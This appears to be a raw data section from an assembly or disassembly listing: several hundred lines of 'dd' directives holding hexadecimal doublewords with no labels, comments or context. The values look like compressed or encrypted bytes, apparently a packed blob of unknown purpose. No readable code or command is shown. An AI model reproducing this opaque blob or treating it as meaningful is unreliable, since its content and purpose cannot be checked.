dd 4075A201h, 2F9A4572h, 915958DFh, 0E9C5A4F3h, 0FBAD543Eh
dd 827A927Bh, 0BDE11A60h, 0B61ABFFBh, 0DFC46203h, 8B6B03DBh
dd 0E6000E3h, 7DB0D4D2h, 48DE813Eh, 0AFB1F561h, 58871623h
dd 0D8D9539h, 178932Dh, 14353718h, 6395C4F5h, 0A8DD9553h
dd 159B595Eh, 0A84E7802h, 0D9691601h, 8D188C0Bh, 0F06B20Ch
dd 1B00E5BDh, 8BDF2D41h, 10FF7951h, 1CE33A21h, 3BB085DAh
dd 36224851h, 84786366h, 0DA40F17Ch, 2E8EA9A0h, 0EBF4B030h
dd 2691BC9Bh, 762DF0AAh, 27C68B49h, 0C32EA024h, 1046AA87h
dd 2E971B64h, 8BCF9626h, 9818B4E3h, 774AE8F5h, 255CD27h
dd 272576D6h, 9F06CB4Ch, 0C994C54Eh, 9AB1B376h, 3B311E88h
dd 3E234ABCh, 0ABA30F57h, 2D1525D8h, 80107D8Ch, 0F734EEEBh
dd 0A3B8011Fh, 0A5AB5CBBh, 19CF840Eh, 6001B817h, 389F3858h
dd 59435210h, 0DE4A8D9h, 0FE239E1Ah, 0E5C92A43h, 6C8E6D51h
dd 0AAB25Bh, 3F84665h, 11738945h, 0D0AE643Fh, 0C4FF872Fh
dd 0AF20C967h, 55AFCE6Bh, 0E12C0D99h, 0C38DA1B2h, 0AE930787h
dd 0E0C6D27Bh, 0C11D4394h, 67637F93h, 2CEF1B71h, 8C17CFE9h
dd 81BAC3F5h, 9E254CA9h, 33CE5723h, 8DF1EC51h, 936227EFh
dd 0C1D644Eh, 9F3735F9h
dd 672CEB1Ah, 1E8A3923h, 0A076FB60h, 873BD2C4h, 9F5174D5h
dd 214BA85Ch, 510A4A13h, 2AAC7B3Dh, 0C521037Dh, 4C9C5420h
dd 809C10C9h, 93573419h, 79065E1Eh, 484A0DD5h, 5CBED63Ah
dd 0A4608E4Ch, 0AFB0DB87h, 4E1F38ACh, 88344E46h, 89DCD05Bh
dd 2BB1AB82h, 25A933C6h, 0D4B074A0h, 7A896015h, 5A905E3h
dd 3BDCE563h, 9D3D3D03h, 0E230D047h, 125068F0h, 0DD094AB5h
dd 338703FAh, 44686A04h, 60C4E642h, 535DC694h, 8B33DD18h
dd 2640F4DFh, 0C28F749h, 0BF2040EBh, 8DBB6D2h, 8B9CBB78h
dd 0F22FD6h, 0A4AE6144h, 17981889h, 0DF940323h, 5328189Ah
dd 5E9A641Dh, 4624004Eh, 3D108968h, 0FF33676Eh, 5F5E5A4Ch
dd 4C8BC359h, 0E8535E6Fh, 47088900h, 800C03D9h, 6500C382h
dd 8C9101Fh, 6C04h, 89F838Dh, 600300B0h, 0F044B510h, 0B05C2017h
dd 0F75EE61Dh, 11B37C0h, 411B2A03h, 0C141065Fh, 0A1409003h
dd 2430060h, 2E1720B0h, 5803C820h, 642013DFh, 28DF0B58h
dd 0A10320ECh, 2C6F761h, 1710422Fh, 30C003ECh, 36CB791h
dd 1F1B7796h, 462FD808h, 21DBFCAh, 0B0579020h, 7086C00h
dd 6F320806h, 76036401h, 220B00FFh, 6C07D8h, 0A4AFF0Eh
dd 20001Fh, 13036500h, 32422540h, 0CA413893h, 461FD887h
dd 930D5FC0h, 27604147h, 961F1216h, 0FFC85000h, 2B5B0F55h
dd 0C02BFFD2h, 8AF7E280h, 0BFF4101h, 0C2F68314h, 0FFF27508h
dd 3274F63Ch, 2E74F73Ch, 74CD3CFAh, 11173C37h, 0C6F6F640h
dd 44E7580h, 6F7540F6h, 7520F61Eh, 4B70950h, 0C1D18B58h
dd 84BE002Bh, 707E281h, 2C29ABBh, 0C35BC6FBh, 7D28CE80h
dd 0D2753801h, 0A95B07AAh, 0B65404CDh, 0DA2639AFh, 0E62D07C5h
dd 945AC0BFh, 0FA134183h, 0FFFA837Fh, 0C28BB175h, 80D1EBFAh
dd 1CB720F6h, 66FAB75h, 0EDA6EB21h, 5702F280h, 0A87510EDh
dd 0EB06ED07h, 0C6C11A3h, 7A0B6C6h, 0EF9B0CB6h, 66E08A38h
dd 9F07B725h, 74DFC0FCh, 0F72D2483h, 575043Ch, 7246D16h
dd 7440ED12h, 80C00417h, 9FBF1174h, 850F05F8h, 0F0D5061h
dd 0E904ECCAh, 1790759h, 199D51E9h, 0E74DF06h, 2333ED29h
dd 7B1B3D6Ch, 735E902h, 3797E8B0h, 919EBCD8h, 0BE9091D0h
dd 9E909381h, 9604DF9Bh, 0ED9E8D9Dh, 19DF868Dh, 91B67D9Bh
dd 119E89DAh, 9A8915DFh, 96FD8C8Dh, 90DF9190h, 0A209699h
dd 230045E4h, 0E2E20308h, 321D1C3Dh, 38C303B4h, 1937A8C6h
dd 34A3EEEAh, 1210EFBCh, 0A0482405h, 531A6A30h, 214F484h
dd 0F3492816h, 0B047CE82h, 53A9317Eh, 8378FC96h, 80100000h
dd 5D7A82F9h, 25252357h, 0C6D08205h, 0A482B517h, 4FAE3DD7h
dd 0BD0D1002h, 3D07A346h, 0A8618201h, 0BA3C7EDCh, 0A3F8211h
dd 1A834CC8h, 0F0690166h, 0D400B30Eh, 8F7C19EFh, 0DE6500D2h
dd 0DF6EC0A0h, 0B0403A1Ch, 900B4CB0h, 798C0129h, 341D2754h
dd 5822C3D0h, 93EC0D75h, 7C52B974h, 61160E0Dh, 4D64BD4Ah
dd 0D6E1F9F9h, 3B128F64h, 873CD95Bh, 5961536Ah, 0AF6A286Ch
dd 6B4B0480h, 589BA822h, 6820CA66h, 0D00D16EFh, 6AC60Fh
dd 8AB9A18h, 0FECEB0Eh, 30146B74h, 8B3C0A28h, 930D5406h
dd 0F1A1579Fh, 0E458B6A5h, 2DC32A8Bh, 52D5E4C1h, 0BD0F434Dh
dd 0C6466A81h, 0E2D10FEFh, 0D11569B3h, 31203513h, 2AFA03FAh
dd 184BD0Ch, 83F75Bh, 509D19BAh, 299F37ABh, 9064139h, 0B8552B4Ch
dd 0A5CFBC42h, 2B0FA0C6h, 179E6037h, 10460F63h, 0C23B8Dh
dd 42001786h, 66CB6C51h, 10250F1Ch, 6B0362FEh, 8DD125Ch
dd 8055A8EFh, 0B539EAC6h, 600E00A1h, 0D95F5111h, 2404FC81h
dd 3ADE68B1h, 34030956h, 0A7B16304h, 0ED8C8711h, 8740BFA8h
dd 17031D60h, 81662680h, 6F4EF8F7h, 0C08C0D8Dh, 9D51ACAEh
dd 0FC5974A3h, 0F8EC2D69h, 3B5F6C0Eh, 0C4884AD6h, 0A7DB61B5h
dd 8057E85Dh, 477D9246h, 605EC0BCh, 0F7B7C290h, 0F0D0044Ah
dd 9AD5C9BAh, 20CA51D8h, 0DB156637h, 0CB34800h, 0A1C3812h
dd 67C0CB7h, 0BA08FAB6h, 59BD9608h, 8C9F3100h, 481D313Bh
dd 0EE8A28Bh, 0AB2210B8h, 828F4182h, 52AF18EBh, 42414832h
dd 0C84B5FAAh, 0D7AB02DDh, 0D44B441Ch, 5CE5B7A8h, 6EA4D780h
dd 0EFD17828h, 0DAC50862h, 6F68969Fh, 0DE601179h, 3D2173Bh
dd 8AAC947Fh, 0FED2F610h, 84401088h, 108875D2h, 85E8AACAh
dd 0ED59DA88h, 25E6B808h, 8AF600C7h, 70E74717h, 43D19183h
dd 7D9507E8h, 65737500h, 855A0072h, 93D1DC8Ah, 44DF2458h
dd 4106AE2h, 3F0291BCh, 0C4128EC0h, 9211075Ch, 0C18F125Fh
dd 0A8890796h, 0A03B49FBh, 293C062Dh, 0FF4069Bh, 0A0721011h
dd 0DEA63708h, 0AC2B806Fh, 0D54394EFh, 4FBB2381h, 0E20A006Ah
dd 55909855h, 0C1176787h, 0A156FDD5h, 925083D0h, 0B1DE114h
dd 32D0D074h, 2334191Fh, 7A50386Fh, 9202CBC6h, 0B036E2A6h
dd 82B2DA52h, 6AC5D92Fh, 20C21900h, 0F32FB22Bh, 0F1180000h
dd 6816D10Ch, 8715610Ch, 9208F826h, 0AF990920h, 0D6B765E1h
dd 39FBB80h, 2F5EA256h, 8C3BFFCh, 6310C624h, 0ABC1C11Ah
dd 4BC156BBh, 67904471h, 4DFF6A17h, 0D2A27168h, 0F85053A8h
dd 0FF28F8E8h, 0A87290FFh, 0DAADFF62h, 1217BFC4h, 79011809h
dd 0F6736E10h, 0B335C969h, 0E4E91251h, 2DD508EFh, 34BFE8F7h
dd 9908945Fh, 8614E18h, 0E92919EDh, 2C2DC6D9h, 0E78D3AA0h
dd 0F9AD70E2h, 1290940Ch, 26AE21B2h, 8D09FFA8h, 0A8835FBDh
dd 0A8DF9000h, 106EB970h, 4BF327B1h, 708A424Bh, 14476092h
dd 458FF986h, 0A6DCD1D2h, 25F59849h, 6592F0C1h, 3761FB28h
dd 2752C0D2h, 21E11AC4h, 0C997388Ah, 0E07CAA66h, 1B230177h
dd 0EE7F41E9h, 0FC6A0875h, 0A6FC8BCCh, 7C52FD74h, 1A50035Ch
dd 0F8C2227Fh, 20585046h, 0B45F88B2h, 52927D2Eh, 5C4B9556h
dd 0C02C4895h, 0E0840499h, 42C8681h, 0C4A0D692h, 77A8586Ah
dd 39DECB4Bh, 0E49A1B04h, 584EF163h, 0F502D6FFh, 0B117503h
dd 0E8A85FA4h, 0D5BE932h, 3033828Dh, 68D31C85h, 0E626B400h
dd 351CD318h, 75D69520h, 5E23586Ah, 7DB47D24h, 0EE34814h
dd 8B31DC8Dh, 22C62A10h, 5D90A3BBh, 6C9407BEh, 129C12DCh
dd 0EF245800h, 50329B0Fh, 0A7984D6Eh, 59ADAC88h, 87BF304Fh
dd 802EE0Ch, 39E20303h, 87844F64h, 8BE32230h, 0CF000686h
dd 0B7458F1Fh, 642E04BEh, 0C445AF81h, 0C608D90Ch, 55C63341h
dd 0E8743DF2h, 0C82EFA51h, 0A6822A41h, 2BEA804h, 3DD4B14h
dd 9B565DB4h, 3C0A8B48h, 2310723Ah, 20ACCD22h, 0EE18B5AEh
dd 350F06BDh, 9BF34DEBh, 0A9B279A2h, 6FC43270h, 0FFF68ED8h
dd 380AFFA4h, 10629BCh, 82B58340h, 8DDD09DFh, 6AB2590Bh
dd 1543FAB2h, 2B6039DDh, 0D9176010h, 8301F39h, 61432293h
dd 4546D129h, 22757C8Eh, 70FC2D93h, 0C4837051h, 810D4B0Ch
dd 5FC72477h, 81C71B0Fh, 2BE6E180h, 1070DD92h, 0FF47F768h
dd 0C734C7E7h, 5DD015F2h, 0B90EAD18h, 0B0BC044Eh, 0B1870B65h
dd 13101C82h, 0F0D419D5h, 93972D7Eh, 3D67B70Fh, 55CABE35h
dd 7A260CD7h, 0C6310A0h, 4B896005h, 6668FF99h, 0C1E29735h
dd 605500F0h, 3C332A23h, 2E170F82h, 0BA839998h, 0B65835DFh
dd 0FE69A27Ch, 14E75B3Ch, 9C6E092h, 69803098h, 8B38973Ah
dd 76601E48h, 49580D43h, 0B468E6FEh, 1368CD43h, 5282DF73h
dd 64053B4Eh, 0BE0087F8h, 0A859DEB5h, 51027CC9h, 259A096Ch
dd 0C2181F90h, 7DB5529Bh, 0A0576405h, 1B453A12h, 2E51C1ACh
dd 0CE90DD5h, 22511499h, 5408EFD4h, 0AB0F9AC3h, 0C43F49BEh
dd 40DA1B5Ah, 5FF41D53h, 6F045BAFh, 80F395F7h, 0E89ECAF1h
dd 0E2FB100Ch, 770CBFCCh, 882FBFCBh, 4B01E6BDh, 377C35Bh
dd 45DF05F8h, 5C3C5DBh, 83B8BF0Bh, 68F378E2h, 1045ECh
dd 0C1F37A5Eh, 0F449B3CBh, 0EB5E5B0Ah, 0D3B8B650h, 0F759E204h
dd 491FE92Bh, 56D08B5Ah, 3238DDDBh, 81F3FDECh, 0A8EB2EF3h
dd 47597176h, 0C11D6FEFh, 3B7F15C2h, 0DD13EF83h, 0C11ED90Bh
dd 0F9E383F6h, 5FDD0CF3h, 0F3FE190Ah, 188AD23Bh, 0A2CFE03h
dd 0F231E7BFh, 1DFAA187h, 0FFF2955Bh, 83D11B06h, 4A4051F3h
dd 7FCAF381h, 4ED68BF2h, 0F3FA4B4Ah, 83F2D285h, 16D46588h
dd 5B453DD4h, 0AE0C8F2h, 0C7DBE046h, 1728506h, 0CAC1C0BDh
dd 0EE4D871Ch, 1B2F22FFh, 351E7832h, 3921FF44h, 3D25D30Eh
dd 29FF1F4Bh, 2D610D41h, 0FF8C7945h, 34AD4831h, 38ADB04Ch
dd 0C69650F8h, 0AB17543Ch, 0BCFF5740h, 7B275B43h, 0FF2B5F47h
dd 97624B7Fh, 8632664Eh, 366A52FFh, 6D5F2C8Ah, 3D71FF59h
dd 74693391h, 0DCFD7760h, 0DFDF7B63h, 9F1DBF67h, 0F9E7836Bh
dd 53876FFFh, 998B73A7h, 8F77F092h, 6314AF5Bh, 5CFDDE7Fh
dd 0BB679B83h, 0BF1DBF87h, 3F07A38Bh, 0A69C65FFh, 0CA76AA92h
dd 7AAEFF96h, 0CDB29ACEh, 0A5FF74F2h, 0B8B9A1B5h, 0FFAC7B7Bh
dd 0CFC0A8BCh, 0A5C3AC86h, 2BC7AFFFh, 0CDCAB3E3h, 0DCCEF6B6h
dd 0FFFDBACEh, 0D5C494D0h, 0FFD8C997h, 0FCA8DCC4h, 68DDE0C8h
dd 14E3CCFEh, 7B3E7CFh, 1CFB5717h, 0FDEFD7FFh, 0BFF3DB9Dh
dd 0F6DFFF13h, 0F9EDB805h, 3E1BFCE5h, 0D664B7FFh, 6FFEE11h
dd 0FCC826D2h, 10CF509h, 6DFF7C16h, 1306D25Bh, 0E3FF17FFh
dd 0E71B0337h, 0FF1F073Bh, 230B3FEBh, 260F6F6Dh, 291235FFh
dd 912C158Eh, 5530FF18h, 42331C5Eh, 9BFF371Fh, 3A2CF964h
dd 0FFA23E26h, 0AA422AC7h, 4538045Ch, 483A07EDh, 6C18FFFFh
dd 3B4F400Eh, 0AFFF6153h, 7723573Fh, 0FFBF5A43h, 0C7C25E46h
dd 4D615220h, 387365FFh, 83776951h, 0D16DE555h, 0D7FFF50h
dd 9541755Dh, 45FF7961h, 497D6599h, 0C00F0E9Dh, 0BF458268h
dd 0CB15747Fh, 75FF85ACh, 79AD598Dh, 0FFB4F492h, 958954A0h
dd 0A8589981h, 0AB9D85FFh, 0A0955F85h, 0A396FE62h, 7D90A88Fh
dd 0FFEE8563h, 0B098282Dh, 0B49C93BEh, 0A0D480FFh, 0A1B370B8h
dd 0BCBBFFBBh, 244C2EBDh, 0AB82C6E5h, 0EFBF7F09h, 0C8EF0E58h
dd 7F1701B5h, 1862107Fh, 0DB49D2F9h, 39DB4CF8h, 3722DEC4h
dd 0F46F787Fh, 0A7E90847h, 0ED59D66Fh, 0D6EDFF5Ch, 0F11D09D6h
dd 0F5FFDBF2h, 46F7F6F5h, 5B1F5E86h, 0A9FF008Dh, 0D004ECB9h
dd 0FF08F024h, 0DF48216h, 0F9808A67h, 31DD11FFh, 1691168Eh
dd 19FFFFB7h, 531B1A19h, 43E062ACh, 6F82091Ch, 8CB4CF7Fh
dd 132EC04Dh, 0E97FDF54h, 305776C0h, 443920F8h, 0FF5FCA38h
dd 40263DE8h, 424140FFh, 6A89D34Dh, 4B33FF43h, 5037C056h
dd 0A6C0851Ah, 7FDF5039h, 7D9CE664h, 0B438856h, 0F020BF8Eh
dd 266087A6h, 296757FFh, 6FE76A5Eh, 0A06FFFEAh, 73805658h
dd 77FF5D74h, 0C8797877h, 0FCA1E008h, 2B826A82h, 1D6F6E3Bh
dd 838A72A6h, 8F7CE398h, 3F020CE9h, 139810FFh, 813998E0h
dd 0D57FEF82h, 0FFC5E42Eh, 0A5A58B9Eh, 3651A7A6h, 0B0CF0EFFh
dd 0B0AFAF95h, 426BFFB1h, 0A2B2D9F8h, 0BAFFC6BBh, 6ABFA74Ch
dd 10C2A8BFh, 0CFFF8E12h, 0C5EC0B55h, 0D8FFCDB5h, 9CD2B942h
dd 32BB2807h, 0FF1E2CDFh, 631BC5D8h, 0A2E1FFE0h, 0E2092872h
dd 0E9FFD9A8h, 69ECE0ABh, 0FFF16CF1h, 59F5DD22h, 0FBE28675h
dd 0B6A46DFEh, 2C0DFFE7h, 302C697h, 932704FFh, 0F20D2C6Bh
dd 0D0CFE0Ch, 559FF20Eh, 0FFCB0D36h, 0D9C04617h, 1E061A0Ah
dd 75E60FEh, 23222121h, 0FF3D0D82h, 1DEA2C4Bh, 5F2F172Bh
dd 341BD1FFh, 0A7825305h, 39AAED39h, 9FCFFA7h, 402FFF5Dh
dd 7F4D1129h, 8CD6FFC5h, 3D0C466Dh, 51FC394Dh, 553DC95Fh
dd 5AE12F21h, 97854BADh, 7E2AFFFFh, 626248EFh, 54F96463h
dd 658CABF5h, 7FE13961h, 8094D472h, 75856934h, 8838CBFFh
dd 3F65FF8Bh, 76428075h, 88FF6F83h, 74435D70h, 0FE080D8Ch
dd 739E9078h, 1760947Ch, 0B15098E1h, 0EF9FF93h, 0A6C5042Ch
dd 0EE38CF1Fh, 9FA891CFh, 0F8BB29F0h, 0A419BB2Ch, 7F970ABEh
dd 27FF4F58h, 0BB87C9E8h, 0A5CD39C8h, 0B9FF013Ch, 62F19DD1h
dd 0FF52D74Fh, 0CB99D8D7h, 50DF4DDAh, 0C8B8DFF1h, 8E6F01E2h
dd 0FF4B73DCh, 0EDD5ED0Ch, 0E2AFCFFBh, 0F4DCF0FCh, 40DDB502h
dd 0F99B8E4Dh, 0FA21408Ah, 9460BFE7h, 0F4042B4Ah, 2CD80CFFh
dd 0FB0FFFCEh, 21B9FF14h, 28180078h, 1CFF04A8h, 20086F91h
dd 0FF0C40ECh, 10B93224h, 14993628h, 18F72CFFh, 182F23EEh
dd 3337FC60h, 37371D34h, 0C87F5B10h, 4261A0FFh, 8A09432Ah
dd 482FF8F2h, 0D64BFF4Fh, 0FFA5F3FFh, 0FF701CC2h, 0F4F2132h
dd 87FFC6EEh, 76685068h, 0E36D54E0h, 0FF51D762h, 5D33037Fh
dd 0FF421D76h, 887A629Dh, 4A7E66BBh, 81679EF2h, 12E9F081h
dd 4A1FBFEAh, 8E748B81h, 0FC8E5210h, 0B8F71F40h, 0A7FF6F99h
dd 9EFF1612h, 8A8C9E19h, 0FF1F7AA3h, 54A78F9Eh, 0CEED3376h
dd 0AF97B7FEh, 0B29804BDh, 0E28EA520h, 0DFFB4534h, 7CBDA58Bh
dd 0C2A9FE71h, 0AE2476F8h, 0B7AD80C7h, 0CACAB0FFh, 5DD5CCCBh
dd 0CDF4F813h, 5FD4D4BAh, 1D67D9FFh, 50D7FFFEh, 81E053E0h
dd 0F2E0E4CCh, 6F8ACD70h, 5078907Fh, 0DAF2C011h, 6369D4BFh
dd 0FFF766F7h, 0FAEAB964h, 0E9FDF1BCh, 0B6E501FFh, 0E2BD05EDh
dd 0A90880EEh, 8870607Fh, 0D10B775Fh, 0D4FC1204h, 18FE150Ah
dd 2BFF6F18h, 42F981A9h, 22220823h, 8BB3BA7Fh, 0FFA82D4Ch
dd 0EC2EAB2Eh, 52FE321Ah, 2361EFAh, 0F05F2256h, 0AE3FAB3Ah
dd 2B123FFFh, 2F062F43h, 9655F047h, 4F2F4A30h, 0FBDBEA4Ch
dd 3A5574B3h, 567FFF54h, 7EBDE5B9h, 5E44CB5Fh, 0F199FF60h
dd 516188A7h, 0CFFBB6Ah, 3B6F5665h, 0FF5B8489h, 0EC933F73h
dd 0D278EF78h, 8A7C64FFh, 0FE81FBEEh, 6DD3FF81h, 3605AE86h
dd 89FF896Fh, 1ADF8B8Ah, 0FF94B3F2h, 967E64BCh, 997F1787h
dd 9B9A99FFh, 0C3E22C7Eh, 0A58CFF9Ch, 91D016FAh, 33E0B7A9h
dd 0DFA0AC92h, 153D557Fh, 9CB7E5D6h, 47B7FFB6h, 0A6C1E01Fh
dd 0B06C0C0h, 953BCFDh, 0FF8CC3EAh, 0C493FFF9h, 0D6D8C0D4h
dd 0E5FF5F9Eh, 0ACE07B37h, 6F88C900h, 4C74A77Fh, 0D3EECD0Dh
dd 3680F07Dh, 0FF8CF017h, 5A0AE00Fh, 0FFDF2C0Bh, 0AF2B824h
dd 0F62AD6FFh, 0FAB38D0Eh, 0A36FFF12h, 16CD9496h, 1BE01817h
dd 5F821C02h, 85ADAF7Fh, 0C27FC46h, 28272626h, 506F056Fh
dd 3016FF29h, 9B323130h, 5AE079C3h, 1D502333h, 1D17E128h
dd 44FFBA5Fh, 30CB44BDh, 0C6383C48h, 0FF023E0Ah, 504F4E4Eh
dd 0FF97E173h, 59415178h, 5D450567h, 7FCC6B8Bh, 62616060h
dd 0A9FFF384h, 6C53638Ah, 822BB819h, 0B17F2355h, 9CB000C8h
dd 0C8FFDF7Ah, 0C5357F66h, 71FF9481h, 0FFBEA34Fh, 71FD75BBh
dd 0FF7FA608h, 0B5D41E38h, 99E41C8Eh, 0BF987EC5h, 2B469A42h
dd 9B81C2E1h, 0BB17FFFh, 0A817A814h, 0E0FFCDADh, 586ECC78h
dd 1D379BEAh, 0B8FF26D3h, 0A412B829h, 0C6F6F9BCh, 0FFFFBFA5h
dd 2850A8C1h, 0E0B2CAE9h, 5FB00ECAh, 0B7EE9AFFh, 0D2D1FCD1h
dd 3A62A7D3h, 0DD4D1F6Fh
dd 4BDDF450h, 0FFBFE0C6h, 2973CFE2h, 0FFE3810Ah, 0D76A797Fh
dd 0FF101FF0h, 6AF567D4h, 0F9E1FDF5h, 0E53007FFh, 0F55827FEh
dd 1F7F4C0h, 1BA0538Bh, 427FEF8Ah, 0FF317098h, 4713FA12h
dd 16FC3792h, 0A94EFF77h, 1940FA5Fh, 50202006h, 6915BFFFh
dd 2B13234Ah, 0FF4BF7D2h, 1BB83DFFh, 1C53FF33h, 0FF3636C6h
dd 7FC96BFDh, 0FF633960h, 0A9D1F0E6h, 0FF8C4B6Ah, 56CEFF78h
dd 0F13756D1h, 7A265A42h, 7FAAFF8Dh, 67674DFFh, 3C6968FFh
dd 6A91B0FAh, 0FD72FA5Ah, 5F6A3477h, 6E847AFFh, 66FF1B6Ah
dd 67FB5D91h, 84ABCA14h, 38AA19FFh, 4CFFEFA1h, 0FD179E14h
dd 0A28A259Eh, 0FF2332A5h, 0FF1738B3h, 9CFFD07Ch, 0D282B2B5h
dd 23B8AB77h, 44EF295h, 5C3FBEE5h, 0D0EF2E56h, 44D141F8h
dd 0FFC66DD1h, 0E04C7F72h, 8684E04Fh, 760A75FFh, 0ACE6DFBFh
dd 0C0D9EDDFh, 0E1BDBDF1h, 0B92503F5h, 51F04EFFh, 0FF859146h
dd 412410C4h, 96CC8EFFh, 83102F6Eh, 0FF521396h, 63D34CFDh
dd 0FFBF17FDh, 80A83D19h, 0FF22AC41h, 0A41F1264h, 0FC30A730h
dd 0AE35AB2Bh, 0FF4B9335h, 0FBCFFE47h, 3F253C32h, 33FFDF3Fh
dd 0F26988D2h, 49492F42h, 92DC99FFh, 553C4C73h, 7AEF47EBh
dd 0A8A479FFh, 45DF7F65h, 63E063DDh, 68DCEAFFh, 549168DFh
dd 0AF42FF6Ch, 903C7058h, 73F86732h, 0E986775Fh, 0C697B720h
dd 96CDC005h, 0A24EFFB8h, 0A17FBF22h, 0AFCEEB18h, 9272FF88h
dd 65A2E5ADh, 9B864FFh, 0A19D0C9Dh, 0A0A0FC86h, 33F6A2A1h
dd 18A3DF2Fh, 0AC1BEDACh, 0CFCBFF08h, 48F8A059h, 0B8AD772Fh
dd 0DC88FF5Ch, 0AFF0398Ch, 67F3744h, 0F3E2125Ch, 1D5CBCCCh
dd 5D10BDF4h, 6AF89A7Fh, 0C7DA0120h, 0D78E3B82h, 1F4A8372h
dd 0EBDCAA78h, 0D4DBFF97h, 0FEFF82ADh, 0F8E0A89Ah, 2DE43006h
dd 0FF1C831Dh, 0E920CC7Ch, 5FF0B03h, 6C94D7F8h, 0FFDC0E2Dh
dd 0FF2E2EDAh, 54A5E884h, 0EF2517E2h, 7F69FF4Fh, 0C6CFFF48h
dd 2C2CC112h, 0BF9BFFBFh, 82F5675h, 30F3C9FFh, 9FF7DADh
dd 0F1C3570Bh, 4A4FC64Fh, 731FFF2Fh, 0CD58FFCAh, 5D442858h
dd 24FF7752h, 0D1206249h, 0C54F2655h, 0E1BE3367h, 28FAB6Ch
dd 0D7D6FF31h, 72FFDF02h, 7A79795Fh, 0C88067Bh, 0FF03128Dh
dd 0F988F67Ch, 9ABFCE88h, 291FFA3h, 7D6291FCh, 6F1C0996h
dd 82998D99h, 7FFF9C81h, 52D099Eh, 65F0A7C6h, 508FA699h
dd 3C7E7F37h, 0ACD3E0F2h, 7F6FA299h, 0DD1C44A5h, 0BEA6BEFFh
dd 0C2AA75CCh, 0FFC3ADD0h, 4BDB36E9h, 0FFC219FFh, 7A12D5BDh
dd 0D8FFCC97h, 0DFC69A04h, 0F1CEC81Fh, 4644E3CBh, 97F5FF6Fh
dd 0F8ECFED3h, 0E4AEDD9Fh, 0F6DC7CEFh, 0C4F8FF4Bh, 9BB887F6h
dd 0EA01E601h, 9336027Fh, 0E3032A49h, 0E1D70BF3h, 2FDB0F7Fh
dd 8CB413FBh, 477AFF33h, 1FDF7FA7h, 0B12F2109h, 0DD250DFFh
dd 0DE291189h, 2D15FFE1h, 3219C43Bh, 0CAFDC5ACh, 37A837A5h
dd 49FF2F6Ah, 40FEB6B1h, 0A5D140B9h, 0FF057341h, 44011BFFh
dd 4DC64DC3h, 0E7FF0653h, 3EFE711Dh, 5A595858h, 0DF25EB69h
dd 53215BF4h, 1EFF2F62h, 13054FFBh, 0FCC97F7Fh, 326C93B2h
dd 85FF0D65h, 7A60CBE0h, 0EE7FDFA8h, 0F0A4E30Bh, 84846A85h
dd 17C6FFBFh, 287AECDh, 0C59C33FFh, 840EBF57h, 8831AA9Ch
dd 0B2EA1EAh, 91A6BF5Fh, 0FF429274h, 0F0D13FE5h, 3913C0BCh
dd 0FBB5E16Fh, 0E0FF42CEh, 0FF58D985h, 0A4DF0ACBh, 0C6AD5ECFh
dd 2E46326Dh, 86CACBFFh, 55D97FFh, 3FFF12DAh, 0FF3E66B0h
dd 5FF5EE0h, 0E1B08BFFh, 8B4E87Fh, 0FFB8ECD4h, 0EFEFD50Ch
dd 8284F1F0h, 0F21938FAh, 4797EBB8h, 0FEC775FEh, 3E50FF00h
dd 0BF2FFFFh, 0C5A1AD6Eh, 0FFBF0D95h, 15FD111Fh, 8658FCFDh
dd 0CC1A891Ah, 0FFEAFF4Bh, 0A230A3Eh, 270FABFCh, 10D035F0h
dd 7F2F452Ah, 0F293BB6Ch, 341A3554h, 9DC5F6FFh, 2DFD3F5Eh
dd 7FFF3EA1h, 462E620Eh, 32F8F754h, 3300584Ah, 6F8E3988h
dd 50779671h, 7FA13D82h, 0C0E845BFh, 0FF4A6281h, 0DB901762h
dd 7167DE67h, 0DB6CD8F8h, 0FF468A6Ch, 0FFFFB124h, 0BF22527Bh
dd 0F2765373h, 75E181FEh, 55087E9Eh, 8AFDA125h, 7582C6FFh
dd 91FFBF9Ch, 88939685h, 809099F8h, 0FF979A9Bh, 0FDFF4AF6h
dd 43A38CFBh, 0FF752896h, 0A8E49AEBh, 98702D9Eh, 9736A436h
dd 0E9B0B90Ch, 0FFBABAA0h, 771C607Ch, 9AFF0BC4h, 0C738BCFFh
dd 0C832BB8Ch, 8975FF01h, 0DBC690F6h, 94FE94C4h, 51D9C17Dh
dd 0CE37CD2Ah, 0D8C6CEF8h, 0D5FFFE52h, 0D2F1ACA5h, 0AFDB6EAh
dd 0F0D8F775h, 0B1765BBCh, 0E517F2FCh, 6F15BDB7h, 2C58FFh
dd 0C831F1FFh, 36EE0F8h, 9EEC172h, 5CACFFDFh, 0FF90006Ch
dd 3426A5F9h, 18880E74h, 7FFF6A89h, 0DA03CE8h, 0A1FF1240h
dd 0E433270Bh, 6F2A1225h, 1F571D8Bh, 233AB6FFh, 324E284Ch
dd 572DFFB8h, 4A38747Bh, 0BFE330FAh, 7FFFC90Eh, 0C98D3643h
dd 34FC940Dh, 13CD0F4Bh, 8E0B45EAh, 8F52FF7Dh, 6F58411Ch
dd 28FF5C44h, 5E1D6C7Ch, 0FF2F634Bh, 61237383h, 79602776h
dd 0FF01F085h, 70DB6E6Dh, 6E536A93h, 0C078E8FFh, 0D39F7B64h
dd 0CBB7CCh, 0AFFC76FBh, 0DCD3D7F7h, 6E70BFDBh, 0FEE707C7h
dd 0EC68EA65h, 25BDD27Dh, 78036F8Bh, 0CDFFD2ABh, 0CC5BCBB2h
dd 0F26ADA5Ch, 9AD6DDD4h, 0C2BBACC1h, 7F00EBECh, 0D7176E48h
dd 0BCADD3B7h, 29CBFDFFh, 0CFEF276Eh, 0FF3B45AEh, 0FF1F7423h
dd 3CEAD0E7h, 0D2E08EFFh, 0A8A0B9ECh, 0F6BDFFD4h, 42BE439Bh
dd 0D6FF65CCh, 495DB6C9h, 0FFDA5ED8h, 95DAD06Dh, 0EAD31B5Bh
dd 387C3E77h, 0FB962E97h, 4ACD5FDFh, 8075CAD3h, 0F72D2F2Dh
dd 0D8FFD6DFh, 0D0964DAEh, 7F75F0E9h, 2E15BB61h, 0BF9FD7E5h
dd 36C11C77h, 0CFAFD8EFh, 38E4FD9Dh, 8EDFC71Fh, 0DF6C177Fh
dd 0CC7ABFB0h, 865B6EBBh, 2703DC48h, 0B06C5B68h, 0DAD3FBEEh
dd 70AAFB22h, 63EF0747h, 0F62E999Bh, 0C79F7F32h, 36BE3F5Dh
dd 0F6DFAF8Fh, 9103DDD2h, 19CAFE03h, 0CBF0EDD2h, 0BF566B5Dh
dd 9F6AA17Bh, 0FF63BB78h, 0F4FB247Bh, 6107A76Ch, 3053BB1Fh
dd 0C33E6BF7h, 0D4AB6E7Fh, 0FBAB76CDh, 0DC60CE45h, 0D07E6358h
